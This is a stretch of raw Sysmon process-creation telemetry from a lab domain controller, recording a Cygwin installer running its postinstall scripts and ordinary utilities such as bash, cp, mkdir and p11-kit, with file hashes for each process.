14:56:01.431{A8622C2F-5401-6078-CF0B-00000000AE01}1736C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-CE0B-00000000AE01}6416C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056168Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.423{A8622C2F-5401-6078-CE0B-00000000AE01}6416C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056158Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.307{A8622C2F-5401-6078-CD0B-00000000AE01}5804C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-CC0B-00000000AE01}1612C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056148Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:01.298{A8622C2F-5401-6078-CC0B-00000000AE01}1612C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-CB0B-00000000AE01}6336C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056138Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.290{A8622C2F-5401-6078-CB0B-00000000AE01}6336C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056128Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.173{A8622C2F-5401-6078-CA0B-00000000AE01}5628C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5401-6078-C90B-00000000AE01}6268C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056118Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:01.165{A8622C2F-5401-6078-C90B-00000000AE01}6268C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5401-6078-C80B-00000000AE01}4788C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056108Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.157{A8622C2F-5401-6078-C80B-00000000AE01}4788C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056098Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:01.027{A8622C2F-5401-6078-C70B-00000000AE01}5412C:\cygwin64\bin\trust.exe-----"C:\cygwin64\bin\trust.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8DDBACD5081ABDAD4382B262BF82C15A,SHA256=5A88BB0A91506D24DE68EDC9F3E394EC686FBA0F0099425996CBDAB12953F446,IMPHASH=65914CDD7DF81669EB24F872C1794FED{A8622C2F-5400-6078-C60B-00000000AE01}5220C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\bin\p11-kit.exe" 154100x800000000000000056088Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.998{A8622C2F-5400-6078-C60B-00000000AE01}5220C:\cygwin64\bin\p11-kit.exe-----"C:\cygwin64\bin\p11-kit.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4DCD68BAF000AD8F19FAE2B19DDE1999,SHA256=4AEFE8637AFE985529126AB69FDB634205C8E7B7C40FA882A50752C9D1430521,IMPHASH=2B32226A1CA6BD394F0E95BE7A61431E{A8622C2F-5400-6078-C50B-00000000AE01}7016C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056078Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.989{A8622C2F-5400-6078-C50B-00000000AE01}7016C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056068Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.974{A8622C2F-5400-6078-C40B-00000000AE01}6196C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-C30B-00000000AE01}6968C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000056058Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.966{A8622C2F-5400-6078-C30B-00000000AE01}6968C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000056047Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.958{A8622C2F-5400-6078-C20B-00000000AE01}2484C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5400-6078-C10B-00000000AE01}1408C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056037Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.950{A8622C2F-5400-6078-C10B-00000000AE01}1408C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-BE0B-00000000AE01}3912C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056027Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.937{A8622C2F-5400-6078-C00B-00000000AE01}5996C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-5400-6078-BF0B-00000000AE01}5864C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056017Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.928{A8622C2F-5400-6078-BF0B-00000000AE01}5864C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-BE0B-00000000AE01}3912C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000056007Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.912{A8622C2F-5400-6078-BE0B-00000000AE01}3912C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-BD0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055997Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.904{A8622C2F-5400-6078-BD0B-00000000AE01}4300C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055986Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.895{A8622C2F-5400-6078-BC0B-00000000AE01}4476C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-BB0B-00000000AE01}4424C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055976Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.888{A8622C2F-5400-6078-BB0B-00000000AE01}4424C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055965Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.880{A8622C2F-5400-6078-BA0B-00000000AE01}2408C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-B90B-00000000AE01}5776C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055955Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.871{A8622C2F-5400-6078-B90B-00000000AE01}5776C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh" 154100x800000000000000055939Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.833{A8622C2F-5400-6078-B70B-00000000AE01}5096C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/ca-certificates.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000055928Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.818{A8622C2F-5400-6078-B60B-00000000AE01}5212C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-B50B-00000000AE01}5516C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh" 154100x800000000000000055918Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.810{A8622C2F-5400-6078-B50B-00000000AE01}5516C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B10B-00000000AE01}5800C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh" 154100x800000000000000055907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.802{A8622C2F-5400-6078-B40B-00000000AE01}5108C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-B30B-00000000AE01}5620C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh" 154100x800000000000000055897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.794{A8622C2F-5400-6078-B30B-00000000AE01}5620C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/p11-kit.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-B10B-00000000AE01}5800C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh" 154100x800000000000000055881Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.754{A8622C2F-5400-6078-B10B-00000000AE01}5800C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/p11-kit.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000055869Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.734{A8622C2F-5400-6078-B00B-00000000AE01}2664C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-AF0B-00000000AE01}5828C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.726{A8622C2F-5400-6078-AF0B-00000000AE01}5828C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055848Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.718{A8622C2F-5400-6078-AE0B-00000000AE01}2084C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-AD0B-00000000AE01}1736C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055838Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.710{A8622C2F-5400-6078-AD0B-00000000AE01}1736C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055827Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.702{A8622C2F-5400-6078-AC0B-00000000AE01}6748C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-AB0B-00000000AE01}6416C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055817Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.694{A8622C2F-5400-6078-AB0B-00000000AE01}6416C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055804Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.685{A8622C2F-5400-6078-AA0B-00000000AE01}3200C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-A90B-00000000AE01}1612C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055794Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.677{A8622C2F-5400-6078-A90B-00000000AE01}1612C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055783Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.669{A8622C2F-5400-6078-A80B-00000000AE01}3208C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-A70B-00000000AE01}2408C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055773Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.661{A8622C2F-5400-6078-A70B-00000000AE01}2408C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055762Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
